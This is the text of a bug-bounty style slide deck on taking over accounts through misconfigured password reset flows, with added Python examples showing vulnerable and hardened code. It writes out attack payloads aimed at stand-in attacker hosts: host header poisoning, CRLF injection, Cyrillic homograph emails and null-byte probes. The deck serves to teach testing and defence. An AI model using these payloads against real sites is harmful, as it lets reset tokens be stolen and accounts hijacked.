Slide 1

Slide 1 text

Account Takeover via Exploiting Misconfigured Password Reset Feature By Tuhin Bose

Slide 2

Slide 2 text

Who am I?

Slide 3

Slide 3 text

AGENDA
1. What is Password Reset Feature?
2. Password Reset Implementation Techniques Used by Developers
3. ATO via Hacking Misconfigured Password Reset Feature
4. Conclusion & QNA

Slide 4

Slide 4 text

What is Password Reset Feature?

Slide 5

Slide 5 text

Password reset is the action of invalidating the current password of an account on an application and then setting a new one. Most services expose a password reset ("Forgot Password") feature that lets a user who no longer knows their password set a new one, usually after proving control of the email address or phone number on the account. Because it replaces the credential outright, every weakness in that flow is a direct path to account takeover (ATO).

Slide 6

Slide 6 text

Password Reset Implementation Techniques Used by Developers

Slide 7

Slide 7 text

Password Reset Implementation Techniques Used by Developers

Slide 8

Slide 8 text

ATO via Hacking Misconfigured Password Reset Feature

Slide 9

Slide 9 text

1. Host Header Injection - Password Reset Poisoning
Host: evil.com or X-Forwarded-Host: evil.com
If the application builds the reset link from the request's Host (or X-Forwarded-Host) header instead of a configured origin, the victim receives a genuine-looking email whose link points at the attacker's domain. When the victim clicks it, the reset token arrives in the attacker's web server logs and can be replayed against the real site.

Slide 10

Slide 10 text

1. Password Reset Poisoning
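The following is an added example (not code from the slides) of the server-side mistake behind password reset poisoning and its fix. It assumes a hypothetical application whose public origin `https://www.company.com` is known from configuration, and models the attacker's side as a function that reads the token out of the link the victim clicks.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption of this example: the application knows its own public origin from
# configuration; nothing in the request is trusted to supply it.
CANONICAL_ORIGIN = "https://www.company.com"


def build_reset_link_vulnerable(headers: dict, token: str) -> str:
    """Builds the reset URL from request headers the client controls.

    X-Forwarded-Host is honoured before Host, which is exactly what the
    `Host: evil.com` / `X-Forwarded-Host: evil.com` trick relies on."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset-password?token={token}"


def build_reset_link_hardened(headers: dict, token: str) -> str:
    """Ignores Host / X-Forwarded-Host entirely and uses the configured origin."""
    return f"{CANONICAL_ORIGIN}/reset-password?token={token}"


def token_seen_by_attacker(link: str, attacker_host: str):
    """Simulates the victim clicking the mailed link: if the link points at the
    attacker's host, the token lands in the attacker's access log; otherwise
    the attacker learns nothing."""
    parts = urlsplit(link)
    if parts.hostname != attacker_host:
        return None
    return parse_qs(parts.query).get("token", [None])[0]


if __name__ == "__main__":
    # Constructed request headers, as sent by the attacker to the reset endpoint.
    hdrs = {"Host": "www.company.com", "X-Forwarded-Host": "evil.com"}
    print(build_reset_link_vulnerable(hdrs, "abc123"))
    print(build_reset_link_hardened(hdrs, "abc123"))
```

Frameworks that offer an allowed-hosts setting (Django's ALLOWED_HOSTS, for instance) only help if the reset link is still built from the validated host; the safest pattern is the one above, where the origin comes from configuration and request headers are never consulted.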

Slide 11

Slide 11 text

2. Modifying Request-URI
POST https://attacker.com/forgot-password HTTP/1.1
POST @attacker.com/forgot-password HTTP/1.1
POST :@attacker.com/forgot-password HTTP/1.1
POST /[email protected] HTTP/1.1
The goal is the same as in technique 1: if the server derives the origin of the reset link from the request target rather than from configuration, an absolute-form or userinfo-style target can make attacker.com the host of the emailed link.

Slide 12

Slide 12 text

2. Modifying Request-URI

Slide 13

Slide 13 text

2. Modifying Request-URI

Slide 14

Slide 14 text

3. Token leakage

Slide 15

Slide 15 text

3. Token leakage
https://www.company.com/#/changePassword/username/token
A reset token carried in the URL is exposed to browser history and, when it sits in the path or query, to server and proxy logs and to the Referer header of any third-party resource the page loads. A token in the fragment (as here) is not sent to the server, but it is readable by every script running on that page, including third-party ones.

Slide 17

Slide 17 text

4. HTTP Parameter Pollution (HPP)

Slide 18

Slide 18 text

4. HTTP Parameter Pollution (HPP)
Send the email parameter twice, for example the victim's address first and the attacker's address second. Different parsers keep the first or the last duplicate, so a back end that looks up the account through one code path and addresses the email through another can deliver the victim's reset link to the attacker.
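As an added example (not from the slides), the block below shows the parser disagreement that HPP exploits: Python's `parse_qs` keeps every occurrence, `dict(parse_qsl(...))` keeps the last, and a first-occurrence reader behaves like a servlet container's `getParameter`. The request body and the split between "lookup parser" and "mailer parser" are constructed for illustration.

```python
from urllib.parse import parse_qs, parse_qsl

# Constructed request body for this example: the same parameter sent twice.
POLLUTED_BODY = "email=victim%40example.com&email=attacker%40example.com"


def all_values(body: str, name: str) -> list:
    """What the wire actually carries: every occurrence, in order."""
    return parse_qs(body).get(name, [])


def first_occurrence(body: str, name: str) -> str:
    """Behaviour of parsers that keep the first duplicate (e.g. a servlet
    container's getParameter)."""
    return next(v for k, v in parse_qsl(body) if k == name)


def last_occurrence(body: str, name: str) -> str:
    """Behaviour of parsers that keep the last duplicate, which is what
    dict(parse_qsl(...)) does in Python and what PHP's $_POST does."""
    return dict(parse_qsl(body))[name]


def single_value_or_reject(body: str, name: str) -> str:
    """Hardened handling: a reset request must carry exactly one email."""
    values = all_values(body, name)
    if len(values) != 1:
        raise ValueError(f"expected exactly one '{name}' parameter, got {len(values)}")
    return values[0]


def simulate_polluted_reset(body: str):
    """Models a back end whose account lookup and mail delivery read the
    parameter through different parsers (a hypothetical split, for illustration).
    Returns (account looked up, address the reset link is sent to)."""
    account = first_occurrence(body, "email")   # lookup hits the victim's account
    recipient = last_occurrence(body, "email")  # mailer addresses the attacker
    return account, recipient


if __name__ == "__main__":
    print(all_values(POLLUTED_BODY, "email"))
    print(simulate_polluted_reset(POLLUTED_BODY))
```

The practical check when testing is simply to compare which address the confirmation message names against which inbox receives the mail; the fix is to reject duplicates outright, as `single_value_or_reject` does, rather than to pick an occurrence.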

Slide 19

Slide 19 text

5. Insecure Direct Object Reference (IDOR)
Use Param Miner to discover extra parameters (or append previously known ones, such as a user id or username) in the reset request, then test whether changing that value resets another account's password instead of your own.

Slide 20

Slide 20 text

5. Insecure Direct Object Reference

Slide 21

Slide 21 text

6. Try homograph on password reset.
[email protected]
email=victim@gmаil.com
[email protected]
Using Unicode: Cyrillic Small Letter A (the "а" in gmаil is U+0430, not the Latin letter)

Slide 22

Slide 22 text

6. Try homograph on password reset.
https://github.com/UndeadSec/EvilURL

Slide 23

Slide 23 text

6. Try homograph on password reset.
Steps to reproduce:
1. Create a new account with [email protected]
2. Go to the password reset page and enter this email: tuhin1729@gmаil.com.xyz.burpcollaborator.net (here the "a" in gmail is the Cyrillic letter)
If it's vulnerable, the password reset link arrives at your Collaborator server: the application matched the lookalike address to the existing account but delivered the mail to the domain you control.
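The block below is an added example, not code from the slides, covering the homograph payloads of slides 21 and 23. It makes three things concrete: the lookalike address is byte-for-byte different from the real one and resolves to a different (punycode) domain on the wire; a back end that folds confusable characters before the account lookup (a hypothetical normalisation, standing in for whatever lenient comparison a vulnerable site applies) finds the victim's account and then mails the submitted address; and a hardened lookup that rejects non-ASCII or mixed-script domains and only ever mails the address on file. The account table and confusables map are constructed for the example.

```python
import unicodedata

# Constructed sample data for this example.
ACCOUNTS = {"tuhin1729@gmail.com": "user-1"}            # address on file, plain ASCII
LOOKALIKE = "tuhin1729@gm\u0430il.com"                   # U+0430 CYRILLIC SMALL LETTER A
COLLABORATOR = "tuhin1729@gm\u0430il.com.xyz.burpcollaborator.net"

# Hypothetical lenient normalisation, standing in for whatever lookalike-folding
# or fuzzy comparison a vulnerable back end might apply before the account lookup.
CONFUSABLES = {"\u0430": "a", "\u0435": "e", "\u043e": "o",
               "\u0440": "p", "\u0441": "c", "\u0445": "x"}


def fold_confusables(s: str) -> str:
    return "".join(CONFUSABLES.get(c, c) for c in s)


def letter_scripts(s: str) -> set:
    """Script names (taken from the Unicode character names) of the letters in s."""
    return {unicodedata.name(c).split(" ")[0] for c in s if c.isalpha()}


def wire_domain(addr: str) -> str:
    """The domain a mailer actually resolves: the IDNA/punycode form."""
    return addr.rsplit("@", 1)[1].encode("idna").decode("ascii")


def lookup_vulnerable(submitted: str):
    """Finds the account through the lenient comparison, then mails the address
    as submitted, so the lookalike domain is what receives the reset link."""
    uid = ACCOUNTS.get(fold_confusables(submitted))
    return (uid, submitted) if uid else None


def lookup_hardened(submitted: str):
    """Exact-match lookup; rejects non-ASCII or mixed-script domains; the link
    goes only to the address stored on the account, never to the input."""
    domain = submitted.rsplit("@", 1)[-1]
    if not domain.isascii() or len(letter_scripts(domain)) > 1:
        raise ValueError("non-ASCII or mixed-script domain rejected")
    uid = ACCOUNTS.get(submitted)
    if uid is None:
        return None
    stored_address = next(a for a, u in ACCOUNTS.items() if u == uid)
    return (uid, stored_address)


if __name__ == "__main__":
    print(unicodedata.name("\u0430"))          # CYRILLIC SMALL LETTER A
    print(wire_domain(COLLABORATOR))           # xn--... : a domain the attacker can own
    print(lookup_vulnerable(LOOKALIKE))        # account found, mail goes to the lookalike
```

The `wire_domain` check is the quickest way to explain the bug to a developer: whatever the comparison logic did, the SMTP delivery happened to an `xn--` domain that is not gmail.com.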

Slide 24

Slide 24 text

7. If they are sending an OTP for password reset, try 2FA bypass techniques.
https://tinyurl.com/tuhin1729-2fa

Slide 25

Slide 25 text

8. Append .json after the endpoint (e.g. /forgot-password.json) and observe whether the response format, content, or behaviour changes.

Slide 26

Slide 26 text

9. Weak Encryption
When generating password reset tokens, developers sometimes use weak or reversible constructions: for example, encrypting or hashing the user id/username plus a timestamp with a weak algorithm and no secret key. An attacker who knows the user id and can guess roughly when the reset was requested can then regenerate the token. Reset tokens should instead be long random values from a CSPRNG, stored hashed, bound to the account server-side, single-use and short-lived.
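As an added example (not from the slides), the block below contrasts the predictable token construction described in technique 9 with a hardened token store, and the store's `redeem` also illustrates the defence against the IDOR variant of technique 5: the account to reset is decided by the token, never by a user id or username the client supplies. The user id, timestamps and the choice of MD5 as the "weak transform" are assumptions of the example.

```python
import hashlib
import secrets
import time

# Constructed sample: numeric user ids are often learnt from an IDOR elsewhere
# in the application, so the victim's id is assumed known to the attacker.
VICTIM_USER_ID = 1729


def weak_token(user_id: int, ts: int) -> str:
    """The pattern the slide describes: user id + timestamp through a cheap,
    keyless transform. MD5 is an illustrative stand-in; any unkeyed function
    of guessable inputs has the same problem."""
    return hashlib.md5(f"{user_id}:{ts}".encode()).hexdigest()


def candidate_tokens(user_id: int, now: int, window: int) -> set:
    """Attacker side: every token the victim could have been issued in the
    last `window` seconds. Each one is a single request against the reset
    endpoint, so the work is the size of the time window, not of the token."""
    return {weak_token(user_id, ts) for ts in range(now - window, now + 1)}


class ResetTokenStore:
    """Hardened issuance: 256-bit CSPRNG token, stored only as a SHA-256 hash,
    bound server-side to the user, single-use and time-limited."""

    def __init__(self, ttl_seconds: int = 900):
        self._by_hash = {}
        self._ttl = ttl_seconds

    @staticmethod
    def _h(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: int, now: float = None) -> str:
        token = secrets.token_urlsafe(32)
        expires = (now if now is not None else time.time()) + self._ttl
        self._by_hash[self._h(token)] = (user_id, expires)
        return token  # goes into the email; the plaintext is never stored

    def redeem(self, token: str, claimed_user_id=None, now: float = None):
        """Returns the user id the token was issued for, or None.

        `claimed_user_id` (anything the client puts in the form) is ignored on
        purpose: the token alone selects the account, which closes the IDOR
        where a user_id/username field in the reset form is swapped."""
        record = self._by_hash.pop(self._h(token), None)  # pop: single use
        if record is None:
            return None
        user_id, expires = record
        if (now if now is not None else time.time()) > expires:
            return None
        return user_id


if __name__ == "__main__":
    issued = weak_token(VICTIM_USER_ID, 1_700_000_000)
    guesses = candidate_tokens(VICTIM_USER_ID, now=1_700_000_300, window=600)
    print("forgeable:", issued in guesses, "with", len(guesses), "guesses")
    store = ResetTokenStore()
    t = store.issue(VICTIM_USER_ID)
    print("hardened redeem ignores claimed id:", store.redeem(t, claimed_user_id=1))
```

When reviewing a real implementation, the things to ask for are exactly the properties the class enforces: where the randomness comes from, whether the database holds the token or its hash, what ties the token to a user, and whether redemption is single-use and expiring.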

Slide 27

Slide 27 text

10. CRLF Injection
POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1
If the decoded request target is spliced into a back-end request or into the reset link, the %0d%0a sequence ends the line and the injected Host header can once again point the reset link at attacker.com.

Slide 28

Slide 28 text

10. CRLF Injection

Slide 29

Slide 29 text

11. Change the request method and Content-Type (for example, form-encoded POST to JSON, or POST to GET) and observe how the application responds. (The slide compares the original request with the modified one.)

Slide 30

Slide 30 text

12. Append null bytes after your email and observe the response.
{"email":"[email protected]"}
{"email":"[email protected]%00"}
Other characters to try: %00, %0d%0a, %0d, %0a, %09, %0C, %20
A difference between the two responses indicates that the value reaches a component that truncates at, strips, or rejects such characters; that behaviour can be combined with the HPP, homograph and CRLF techniques above.
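The following added example (not code from the slides) serves both the CRLF injection of technique 10 and the control-character probes of technique 12. It models a naive gateway that decodes the request target and splices it into a raw back-end request, shows how a line-oriented HTTP parser then sees a second Host header, and gives the hardened check that rejects every probe in the slide's list. The gateway, the back-end host name and the NUL-truncation helper are constructed for illustration.

```python
from urllib.parse import unquote

# The probe characters from the slide, URL-encoded as they would be sent.
PROBES = ["%00", "%0d%0a", "%0d", "%0a", "%09", "%0C", "%20"]


def build_backend_request_vulnerable(request_target: str, backend_host: str) -> bytes:
    """A naive gateway/handler: URL-decodes the client's request target and
    splices it straight into a raw HTTP request for an internal service."""
    target = unquote(request_target)
    return f"POST {target} HTTP/1.1\r\nHost: {backend_host}\r\n\r\n".encode()


def header_lines(raw: bytes) -> list:
    """Returns (name, value) pairs as a line-oriented HTTP parser would see them."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    pairs = []
    for line in head.split("\r\n")[1:]:       # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def has_unsafe_chars(s: str) -> bool:
    """True if s contains NUL, CR, LF, tab, form feed, any other C0 control,
    DEL, or a space: everything in the slide's probe list."""
    return any(ord(c) <= 0x20 or ord(c) == 0x7F for c in s)


def build_backend_request_hardened(request_target: str, backend_host: str) -> bytes:
    """Same splice, but refuses decoded targets carrying control/whitespace bytes."""
    target = unquote(request_target)
    if has_unsafe_chars(target):
        raise ValueError("control or whitespace characters in request target")
    return f"POST {target} HTTP/1.1\r\nHost: {backend_host}\r\n\r\n".encode()


def truncate_at_nul(s: str) -> str:
    """How a C-string based component sees the value: everything after the
    first NUL disappears, which is why a %00 probe can change the response."""
    return s.split("\x00", 1)[0]


if __name__ == "__main__":
    raw = build_backend_request_vulnerable(
        "/resetpassword?%0d%0aHost:%20attacker.com", "www.company.com")
    print(raw)
    print([v for n, v in header_lines(raw) if n == "Host"])   # two Host values
    print(truncate_at_nul(unquote("victim%40example.com%00")))
```

Note that the injected `Host:` line swallows the rest of the original request line (`HTTP/1.1` ends up in its value); real parsers differ in how they treat that, which is exactly why the slide advises observing the response rather than assuming an outcome.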

Slide 31

Slide 31 text

More: https://tinyurl.com/tuhin1729-passwordreset

Slide 32

Slide 32 text

Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729
Thank You!